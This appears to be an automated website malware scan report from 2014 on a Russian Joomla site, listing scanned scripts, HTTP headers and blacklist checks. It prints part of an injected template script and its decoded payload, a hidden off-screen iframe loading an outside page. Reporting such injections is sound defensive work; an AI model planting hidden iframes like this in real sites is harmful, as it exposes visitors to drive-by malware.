Scanned pages/files
| Request | Server response | Status |
http://gummeeglove.ru/ | 200 OK Content-Length: 21704 Content-Type: text/html | clean |
http://gummeeglove.ru/plugins/system/cdscriptegrator/libraries/highslide/js/highslide-full.min.js | 200 OK Content-Length: 70775 Content-Type: application/x-javascript | clean |
http://gummeeglove.ru/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-1.4.4.min.js | 200 OK Content-Length: 78601 Content-Type: application/x-javascript | clean |
http://gummeeglove.ru/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-noconflict.js | 200 OK Content-Length: 20 Content-Type: application/x-javascript | clean |
http://gummeeglove.ru/media/system/js/caption.js | 200 OK Content-Length: 6527 Content-Type: application/x-javascript | clean |
http://gummeeglove.ru/templates/tomandjerry01/script.js | 200 OK Content-Length: 4564 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser', ...[1415 bytes skipped]... Decoded script: <iframe src=http://pixojo.ru/idal.php?siesta style="position:absolute;left:-1200px;top:-1200px;" height="115" width="115"></iframe> | ||
http://gummeeglove.ru//vk.com/js/api/openapi.js?72/ | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://gummeeglove.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://gummeeglove.ru//yandex.st/share/share.js/ | 404 Not Found Content-Length: 223 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gummeeglove.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Mon, 29 Sep 2014 10:02:25 GMT
Pragma: no-cache
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 29 Sep 2014 10:02:25 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f5bf583bfdeebb91fe2a8ccb836fb7bc=a9d206336a2795b440bd5fda98db506d; path=/
Set-Cookie: virtuemart=a9d206336a2795b440bd5fda98db506d
Status: 200 OK
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: gummeeglove.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Mon, 29 Sep 2014 10:02:25 GMT
Pragma: no-cache
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 29 Sep 2014 10:02:25 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f5bf583bfdeebb91fe2a8ccb836fb7bc=a9d206336a2795b440bd5fda98db506d; path=/
Set-Cookie: virtuemart=a9d206336a2795b440bd5fda98db506d
Status: 200 OK
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: gummeeglove.ru
Referer: http://www.google.com/search?q=gummeeglove.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gummeeglove.ru
Referer: http://www.google.com/search?q=gummeeglove.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gummeeglove.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gummeeglove.ru/
Result: gummeeglove.ru is not infected or malware details are not published yet.
Result: gummeeglove.ru is not infected or malware details are not published yet.